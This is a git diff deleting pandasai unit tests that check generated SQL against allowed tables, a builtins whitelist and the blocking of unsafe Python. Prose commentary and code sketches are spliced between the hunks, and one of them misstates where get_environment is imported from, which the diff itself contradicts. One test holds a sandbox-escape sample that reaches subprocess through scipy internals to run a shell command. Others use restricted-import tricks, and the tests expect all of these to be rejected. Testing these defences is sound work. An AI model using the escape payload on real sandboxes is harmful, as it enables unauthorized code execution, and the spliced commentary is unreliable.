- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == 'SELECT "table1".id AS id, "table1".author_id, "table2".hidden AS is_hidden, "table3".text AS comment_text FROM "table1" LEFT JOIN "table2" ON "table1".id = "table2".feed_message_id LEFT JOIN "table3" ON "table1".id = "table3".feed_message_id'
- )
-
- def test_check_relevant_table_multiple_tables_passing_directly_to_function(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- "execute_sql_query('SELECT table1.id AS id, table1.author_id, table2.hidden AS is_hidden, table3.text AS comment_text FROM table1 LEFT JOIN table2 ON table1.id = table2.feed_message_id LEFT JOIN table3 ON table1.id = table3.feed_message_id')"
- ).body[0]
-
- code_cleaning._dfs = [
- MockDataframe("table1"),
- MockDataframe("table2"),
- MockDataframe("table3"),
- ]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Expr)
- assert (
- node.value.args[0].value
- == "SELECT table1.id AS id, table1.author_id, table2.hidden AS is_hidden, table3.text AS comment_text FROM table1 LEFT JOIN table2 ON table1.id = table2.feed_message_id LEFT JOIN table3 ON table1.id = table3.feed_message_id"
- )
-
- def test_check_is_query_using_relevant_table_unknown_table(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse("sql_query = 'SELECT * FROM unknown_table'").body[0]
-
- code_cleaning._dfs = [MockDataframe()]
-
- with pytest.raises(MaliciousQueryError):
- code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- def test_check_is_query_using_relevant_table_multiple_tables_one_unknown(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- "sql_query = 'SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id'"
- ).body[0]
-
- code_cleaning._dfs = [MockDataframe("table1"), MockDataframe("unknown_table")]
-
- with pytest.raises(MaliciousQueryError):
- code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- def test_clean_code_using_correct_sql_table(
- self,
- pgsql_connector: DataFrame,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that the correct sql table"""
- code_cleaning = CodeCleaning()
-
- context.dfs = [pgsql_connector]
- safe_code = (
- """sql_query = 'SELECT * FROM your_table'\nexecute_sql_query(sql_query)"""
- )
- context.config.direct_sql = True
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
- assert (
- output.output
- == "sql_query = 'SELECT * FROM \"your_table\"'\nexecute_sql_query(sql_query)"
- )
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_with_no_execute_sql_query_usage_script(
- self,
- pgsql_connector: DataFrame,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that the correct sql table"""
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pgsql_connector]
- safe_code = (
- """orders_count = execute_sql_query('SELECT COUNT(*) FROM orders')[0][0]"""
- )
- output = code_cleaning.execute(safe_code, context=context, logger=logger)
- assert output.output == safe_code
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
-
- def test_clean_code_using_incorrect_sql_table(
- self,
- pgsql_connector: DataFrame,
- context: PipelineContext,
- logger,
- ):
- """Test that the direct SQL function definition is removed when 'direct_sql' is False"""
- code_cleaning = CodeCleaning()
- context.dfs = [pgsql_connector]
- context.config.direct_sql = True
- safe_code = """sql_query = 'SELECT * FROM unknown_table'
- """
- with pytest.raises(MaliciousQueryError) as excinfo:
- code_cleaning.execute(safe_code, context=context, logger=logger)
-
- assert str(excinfo.value) == ("Query uses unauthorized table: unknown_table.")
-
- def test_clean_code_using_multi_incorrect_sql_table(
- self,
- pgsql_connector: DataFrame,
- context: PipelineContext,
- logger: Logger,
- ):
- """Test that the direct SQL function definition is removed when 'direct_sql' is False"""
- code_cleaning = CodeCleaning()
- context.dfs = [pgsql_connector]
- context.config.direct_sql = True
- safe_code = """sql_query = 'SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id'"""
- with pytest.raises(MaliciousQueryError) as excinfo:
- code_cleaning.execute(safe_code, context=context, logger=logger)
-
- assert str(excinfo.value) == ("Query uses unauthorized table: table1.")
-
- def test_fix_dataframe_redeclarations(
- self, mock_head, context: PipelineContext, config: dict
- ):
- pandas_connector = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-df1 = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})
-"""
- tree = ast.parse(python_code)
-
- clean_code = ["df1 = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})"]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[0], clean_code
- )
-
- assert isinstance(output, ast.Assign)
-
- def test_fix_dataframe_multiline_redeclarations(
- self, mock_head, context: PipelineContext, config: dict
- ):
- pandas_connector = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-import pandas as pd
-
-df1 = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})
-
-print(df1)
-"""
- tree = ast.parse(python_code)
- clean_codes = [
- "df1 = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})",
- ]
-
- outputs = [
- code_cleaning._extract_fix_dataframe_redeclarations(node, clean_codes)
- for node in tree.body
- ]
-
- assert outputs[0] is None
- assert outputs[1] is not None
- assert isinstance(outputs[1], ast.Assign)
- assert outputs[2] is None
-
- def test_fix_dataframe_no_redeclarations(self, mock_head, context: PipelineContext):
- pandas_connector = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- context.dfs = [pandas_connector]
-
- python_code = """
-df1 = dfs[0]
-"""
- tree = ast.parse(python_code)
-
- code_list = ["df1 = dfs[0]"]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[0], code_list
- )
-
- assert output is None
-
- def test_fix_dataframe_redeclarations_with_subscript(
- self, mock_head, context: PipelineContext, config: dict
- ):
- pandas_connector = DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-dfs[0] = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})
-"""
- tree = ast.parse(python_code)
-
- code_list = ["dfs[0] = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]})"]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[0], code_list
- )
-
- assert isinstance(output, ast.Assign)
-
- def test_fix_dataframe_redeclarations_with_subscript_and_data_variable(
- self, mock_head, context: PipelineContext, config: dict
- ):
- data = {
- "country": ["China", "United States", "Japan", "Germany", "United Kingdom"],
- "sales": [8000, 6000, 4000, 3500, 3000],
- }
- pandas_connector = DataFrame(data)
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-data = {'country': ['China', 'United States', 'Japan', 'Germany', 'United Kingdom'],
- 'sales': [8000, 6000, 4000, 3500, 3000]}
-dfs[0] = pd.DataFrame(data)
-"""
- tree = ast.parse(python_code)
-
- code_list = [
- "data = {'country': ['China', 'United States', 'Japan', 'Germany', 'United Kingdom'],'sales': [8000, 6000, 4000, 3500, 3000]}",
- "dfs[0] = pd.DataFrame(data)",
- ]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[1], code_list
- )
-
- assert isinstance(output, ast.Assign)
-
- def test_fix_dataframe_redeclarations_and_data_variable(
- self, mock_head, context: PipelineContext, config: Config
- ):
- data = {
- "country": ["China", "United States", "Japan", "Germany", "United Kingdom"],
- "sales": [8000, 6000, 4000, 3500, 3000],
- }
- pandas_connector = DataFrame(data)
-
- code_cleaning = CodeCleaning()
- code_cleaning._dfs = [pandas_connector]
- code_cleaning._config = Config(**config)
- context.dfs = [pandas_connector]
-
- python_code = """
-data = {'country': ['China', 'United States', 'Japan', 'Germany', 'United Kingdom'],
- 'sales': [8000, 6000, 4000, 3500, 3000]}
-df = pd.DataFrame(data)
-"""
- tree = ast.parse(python_code)
-
- code_list = [
- "data = {'country': ['China', 'United States', 'Japan', 'Germany', 'United Kingdom'],'sales': [8000, 6000, 4000, 3500, 3000]}",
- "df = pd.DataFrame(data)",
- ]
-
- output = code_cleaning._extract_fix_dataframe_redeclarations(
- tree.body[1], code_list
- )
-
- assert isinstance(output, ast.Assign)
-
- def test_check_is_query_using_quote_with_table_name(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse("""sql_query = 'SELECT * FROM "allowed_table"'""").body[0]
-
- code_cleaning._dfs = [MockDataframe("allowed_table")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert node.value.value == 'SELECT * FROM "allowed_table"'
-
- def test_check_is_query_not_extract_created_at(self, code_cleaning: CodeCleaning):
- mock_node = ast.parse(
- """sql_query = 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM "Users" GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'"""
- ).body[0]
-
- code_cleaning._dfs = [MockDataframe("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM "Users" GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'
- )
-
- def test_check_is_query_not_extract_without_quote_created_at(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- """sql_query = 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM Users GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'"""
- ).body[0]
-
- code_cleaning._dfs = [MockDataframe("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM Users GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'
- )
-
- def test_check_is_query_not_extract_postgres_without_quote_created_at(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- """sql_query = 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM Users GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'"""
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [MockObject("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert (
- node.value.value
- == 'SELECT EXTRACT(MONTH FROM "created_at"::TIMESTAMP) AS month, COUNT(*) AS user_count FROM "Users" GROUP BY EXTRACT(MONTH FROM "created_at"::TIMESTAMP)'
- )
-
- def test_check_query_with_semicolon(self, code_cleaning: CodeCleaning):
- mock_node = ast.parse(
- """sql_query = 'SELECT COUNT(*) AS user_count FROM Users;'"""
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [MockObject("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert node.value.value == 'SELECT COUNT(*) AS user_count FROM "Users"'
-
- def test_check_query_with_semicolon_execute_sql_func(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- """df=execute_sql_query('SELECT COUNT(*) AS user_count FROM Users;')"""
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [MockObject("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert node.value.args[0].value == 'SELECT COUNT(*) AS user_count FROM "Users"'
-
- def test_check_query_with_semicolon_execute_sql_func_no_assign(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- """execute_sql_query('SELECT COUNT(*) AS user_count FROM Users;')"""
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [MockObject("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert node.value.args[0].value == 'SELECT COUNT(*) AS user_count FROM "Users"'
-
- def test_clean_code_raise_private_variable_access_error(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-import scipy
-result = {"type": "string", "value": f"{scipy.sparse._sputils.sys.modules['subprocess'].run(['cmd', '/c', 'dir'], text=True, capture_output=True).stdout}"}
-print(result)
-"""
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_raise_import_with_restricted_modules(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-from datetime import sys
-"""
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_raise_import_with_restricted_using_import_statement(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-import datetime.sys as spy
-"""
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_raise_not_whitelisted_lib_with_none_security(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- builtins_code = """import scipy
-result = {'type': 'number', 'value': set([1, 2, 3])}"""
-
- context.config.security = "none"
- with pytest.raises(BadImportError):
- code_cleaning.execute(builtins_code, context=context, logger=logger)
-
- def test_clean_code_with_pltshow_in_code(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-import matplotlib.pyplot as plt
-print('test plt.show is removed')
-plt.show()
-"""
- code = code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- assert code.output == """print('test plt.show is removed')"""
- assert isinstance(code, LogicUnitOutput)
- assert code.success is True
- assert code.message == "Code Cleaned Successfully"
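Among other things, the suite deleted above documented how generated SQL was policed: every table referenced in a query had to match an allowed dataframe, matches were rewritten to their quoted case-sensitive form, trailing semicolons were dropped, and anything else raised MaliciousQueryError. A rough stand-in for that contract (the helper below is a hypothetical sketch, not the removed implementation):

import re

ALLOWED = {"Users": '"Users"'}  # table name -> case-sensitive quoted form

def validate_tables(sql: str) -> str:
    # Hypothetical sketch of what _validate_and_make_table_name_case_sensitive enforced.
    sql = sql.rstrip(";")
    for name in re.findall(r"(?:FROM|JOIN)\s+(\w+)", sql, re.IGNORECASE):
        if name not in ALLOWED:
            raise ValueError(f"Query uses unauthorized table: {name}.")
        sql = re.sub(rf"\b{name}\b", ALLOWED[name], sql)
    return sql

assert validate_tables("SELECT COUNT(*) AS user_count FROM Users;") == 'SELECT COUNT(*) AS user_count FROM "Users"'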
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_execution.py b/tests/unit_tests/pipelines/smart_datalake/test_code_execution.py
deleted file mode 100644
index df7e8722a..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_execution.py
+++ /dev/null
@@ -1,326 +0,0 @@
-import os
-from typing import Optional
-from unittest.mock import MagicMock, Mock, patch
-
-import pandasai as pai
-import pytest
-
-from pandasai.agent import Agent
-from pandasai.exceptions import InvalidOutputValueMismatch, NoCodeFoundError
-from pandasai.helpers.logger import Logger
-from pandasai.helpers.optional import get_environment
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.code_execution import CodeExecution
-from pandasai.pipelines.pipeline_context import PipelineContext
-
-
-class TestCodeExecution:
- "Unit test for Code Execution"
-
- throw_exception = True
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return pai.DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def agent(self, llm, sample_df):
- return Agent([sample_df], config={"llm": llm, "enable_cache": False})
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def code(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- @pytest.fixture
- def code_execution(self):
- return CodeExecution()
-
- def test_init(self, context, config):
- # Test the initialization of the CodeExecution
- code_execution = CodeExecution()
- assert isinstance(code_execution, CodeExecution)
-
- def test_code_execution_successful_with_no_exceptions(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- code_execution = CodeExecution()
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = Mock(return_value="Mocked Result")
-
- def mock_intermediate_values(key: str, default=None):
- if key == "last_prompt_id":
- return "Mocked Prompt ID"
- elif key == "code_manager":
- return mock_code_manager
- elif key == "additional_dependencies":
- return []
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- result = code_execution.execute(
- input='result={"type":"string", "value":"5"}',
- context=context,
- logger=logger,
- )
-
- assert isinstance(code_execution, CodeExecution)
- assert result.output == {"type": "string", "value": "5"}
- assert result.message == "Code Executed Successfully"
- assert result.success is True
-
- def test_code_execution_unsuccessful_after_retries(self, context, logger):
- # Test Flow : Code Execution unsuccessful even after retries
- code_execution = CodeExecution()
-
- def mock_execute_code(*args, **kwargs):
- raise Exception("Unit test exception")
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = Mock(side_effect=mock_execute_code)
-
- def mock_intermediate_values(key: str):
- if key == "last_prompt_id":
- return "Mocked Prompt ID"
- elif key == "code_manager":
- return mock_code_manager
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- assert isinstance(code_execution, CodeExecution)
-
- result = None
- try:
- result = code_execution.execute(
- input="Test Code", context=context, logger=logger
- )
- except Exception:
- assert result is None
-
- @pytest.mark.skip(reason="Removed CodeManager class")
- def test_code_execution_successful_at_retry(self, context, logger):
- # Test Flow : Code Execution successful after one retry
- code_execution = CodeExecution()
-
- def mock_execute_code(*args, **kwargs):
- if self.throw_exception is True:
- self.throw_exception = False
- raise Exception("Unit test exception")
- return "Mocked Result after retry"
-
- # Conditional return of execute_func method based on the arguments it is called with
- def mock_execute_func(*args, **kwargs):
- return mock_execute_code(*args, **kwargs)
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = mock_execute_func
- mock_code_manager.execute_code.name = "execute_code"
-
- code_execution._retry_run_code = Mock(
- return_value='result={"type":"string", "value":"5"}'
- )
-
- result = code_execution.execute(input="x=5", context=context, logger=logger)
-
- code_execution._retry_run_code.assert_called()
- assert isinstance(code_execution, CodeExecution)
- assert result.output == {"type": "string", "value": "5"}
- assert result.message == "Code Executed Successfully"
- assert result.success is True
-
- def test_code_execution_output_type_mismatch(self, context, logger):
- # Test Flow : an output type mismatch raises InvalidOutputValueMismatch
- code_execution = CodeExecution()
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = Mock(return_value="Mocked Result")
-
- def mock_intermediate_values(key: str, default=None):
- if key == "last_prompt_id":
- return "Mocked Prompt ID"
- elif key == "code_manager":
- return mock_code_manager
- elif key == "additional_dependencies":
- return []
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- with pytest.raises(InvalidOutputValueMismatch):
- code_execution.execute(
- input='result={"type":"string", "value":5}',
- context=context,
- logger=logger,
- )
-
- def test_code_execution_output_is_not_dict(self, context, logger):
- # Test Flow : a non-dict result raises InvalidOutputValueMismatch
- code_execution = CodeExecution()
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = Mock(return_value="Mocked Result")
-
- def mock_intermediate_values(key: str, default=None):
- if key == "last_prompt_id":
- return "Mocked Prompt ID"
- elif key == "code_manager":
- return mock_code_manager
- elif key == "additional_dependencies":
- return []
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- with pytest.raises(InvalidOutputValueMismatch):
- code_execution.execute(
- input="result=5",
- context=context,
- logger=logger,
- )
-
- @patch(
- "pandasai.pipelines.chat.code_execution.CodeExecution.execute_code",
- autospec=True,
- )
- def test_exception_handling(self, mock_execute_code: MagicMock, agent: Agent):
- os.environ["PANDASAI_API_URL"] = ""
- os.environ["PANDASAI_API_KEY"] = ""
-
- mock_execute_code.side_effect = NoCodeFoundError(
- "No code found in the response"
- )
- result = agent.chat("How many countries are in the dataframe?")
- assert result == (
- "Unfortunately, I was not able to answer your question, "
- "because of the following error:\n"
- "\nNo code found in the response\n"
- )
- assert agent.last_error == "No code found in the response"
-
- def test_get_environment(self):
- additional_dependencies = [
- {"name": "pyplot", "alias": "plt", "module": "matplotlib"},
- {"name": "numpy", "alias": "np", "module": "numpy"},
- ]
- environment = get_environment(additional_dependencies)
-
- assert "pd" in environment
- assert "plt" in environment
- assert "np" in environment
- assert environment["__builtins__"] == {
- "abs": abs,
- "all": all,
- "any": any,
- "ascii": ascii,
- "bin": bin,
- "bool": bool,
- "bytearray": bytearray,
- "bytes": bytes,
- "callable": callable,
- "chr": chr,
- "classmethod": classmethod,
- "complex": complex,
- "delattr": delattr,
- "dict": dict,
- "dir": dir,
- "divmod": divmod,
- "enumerate": enumerate,
- "filter": filter,
- "float": float,
- "format": format,
- "frozenset": frozenset,
- "getattr": getattr,
- "hasattr": hasattr,
- "hash": hash,
- "help": help,
- "hex": hex,
- "id": id,
- "int": int,
- "isinstance": isinstance,
- "issubclass": issubclass,
- "iter": iter,
- "len": len,
- "list": list,
- "locals": locals,
- "map": map,
- "max": max,
- "memoryview": memoryview,
- "min": min,
- "next": next,
- "object": object,
- "oct": oct,
- "ord": ord,
- "pow": pow,
- "print": print,
- "property": property,
- "range": range,
- "repr": repr,
- "reversed": reversed,
- "round": round,
- "set": set,
- "setattr": setattr,
- "slice": slice,
- "sorted": sorted,
- "staticmethod": staticmethod,
- "str": str,
- "sum": sum,
- "super": super,
- "tuple": tuple,
- "type": type,
- "vars": vars,
- "zip": zip,
- "__build_class__": __build_class__,
- "__name__": "__main__",
- }
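The builtins whitelist spelled out above is the sandbox contract: get_environment (imported in an earlier hunk from pandasai.core.code_execution.environment) builds the execution namespace with pandas preloaded, the requested extras aliased in, and only the listed safe builtins. A minimal usage sketch, assuming the one-argument signature the removed test used:

from pandasai.core.code_execution.environment import get_environment

env = get_environment(
    [
        {"name": "pyplot", "alias": "plt", "module": "matplotlib"},
        {"name": "numpy", "alias": "np", "module": "numpy"},
    ]
)
assert {"pd", "plt", "np"} <= env.keys()
# Note what the whitelist omits: open, exec, eval and __import__ are all absent.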
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_generator.py b/tests/unit_tests/pipelines/smart_datalake/test_code_generator.py
deleted file mode 100644
index 3415f386d..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_generator.py
+++ /dev/null
@@ -1,112 +0,0 @@
-from typing import Optional
-from unittest.mock import Mock, patch
-
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.code_generator import CodeGenerator
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.prompts.generate_python_code import GeneratePythonCodePrompt
-
-
-class TestCodeGenerator:
- "Unit test for Code Generator"
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the CodeGenerator
- code_generator = CodeGenerator()
- assert isinstance(code_generator, CodeGenerator)
-
- @patch("pandasai.llm.fake.FakeLLM.call")
- def test_code_not_found_in_cache(self, mock_call, context, logger):
- # Test Flow : Code Not found in the cache
- code_generator = CodeGenerator()
-
- mock_get_prompt = Mock(return_value=GeneratePythonCodePrompt)
-
- def mock_intermediate_values(key: str):
- if key == "output_type":
- return ""
- elif key == "viz_lib_helper":
- return "matplotlib"
- elif key == "get_prompt":
- return mock_get_prompt
-
- def mock_execute_func(function, *args, **kwargs):
- if function == mock_get_prompt:
- return mock_get_prompt()
- return "Mocked LLM Generated Code"
-
- context.get = Mock(side_effect=mock_intermediate_values)
- context._cache = Mock()
- context._cache.get = Mock(return_value=None)
-
- mock_call.return_value = "```python test_output```"
-
- result = code_generator.execute(
- input="test_input", context=context, logger=logger
- )
-
- assert isinstance(code_generator, CodeGenerator)
- assert result.output == "test_output"
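One detail worth keeping from the deleted generator test: the raw LLM reply arrives wrapped in a markdown code fence ("```python test_output```") and the pipeline strips the fence before handing the code on. A regex sketch of that cleanup (illustrative, not the removed implementation):

import re

def strip_code_fence(reply: str) -> str:
    # Extract the body of a ```python ... ``` fence; fall back to the raw reply.
    match = re.search(r"```(?:python)?\s*(.*?)```", reply, re.DOTALL)
    return match.group(1).strip() if match else reply.strip()

assert strip_code_fence("```python test_output```") == "test_output"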
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_error_prompt_generation.py b/tests/unit_tests/pipelines/smart_datalake/test_error_prompt_generation.py
deleted file mode 100644
index 3f253b4a7..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_error_prompt_generation.py
+++ /dev/null
@@ -1,111 +0,0 @@
-from typing import Optional
-from unittest.mock import MagicMock
-
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.exceptions import InvalidLLMOutputType
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.error_correction_pipeline.error_prompt_generation import (
- ErrorPromptGeneration,
-)
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.prompts.correct_error_prompt import CorrectErrorPrompt
-from pandasai.prompts.correct_output_type_error_prompt import (
- CorrectOutputTypeErrorPrompt,
-)
-
-
-class TestErrorPromptGeneration:
- "Unit test for Prompt Generation"
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- def test_init(self):
- # Test the initialization of the ErrorPromptGeneration
- prompt_generation = ErrorPromptGeneration()
- assert isinstance(prompt_generation, ErrorPromptGeneration)
-
- def test_get_error_prompt_invalid_llm_output_type(self, context):
- error_prompt = ErrorPromptGeneration()
-
- # Mock the InvalidLLMOutputType exception
- mock_exception = MagicMock(spec=InvalidLLMOutputType)
-
- error_prompt.context = context
-
- # Call the method with the mock exception
- result = error_prompt.get_prompt(mock_exception, "code")
-
- # Assert that the CorrectOutputTypeErrorPrompt is returned
- assert isinstance(result, CorrectOutputTypeErrorPrompt)
-
- def test_get_error_prompt_other_exception(self, context):
- # Mock a generic exception
- mock_exception = MagicMock(spec=Exception)
-
- error_prompt = ErrorPromptGeneration()
-
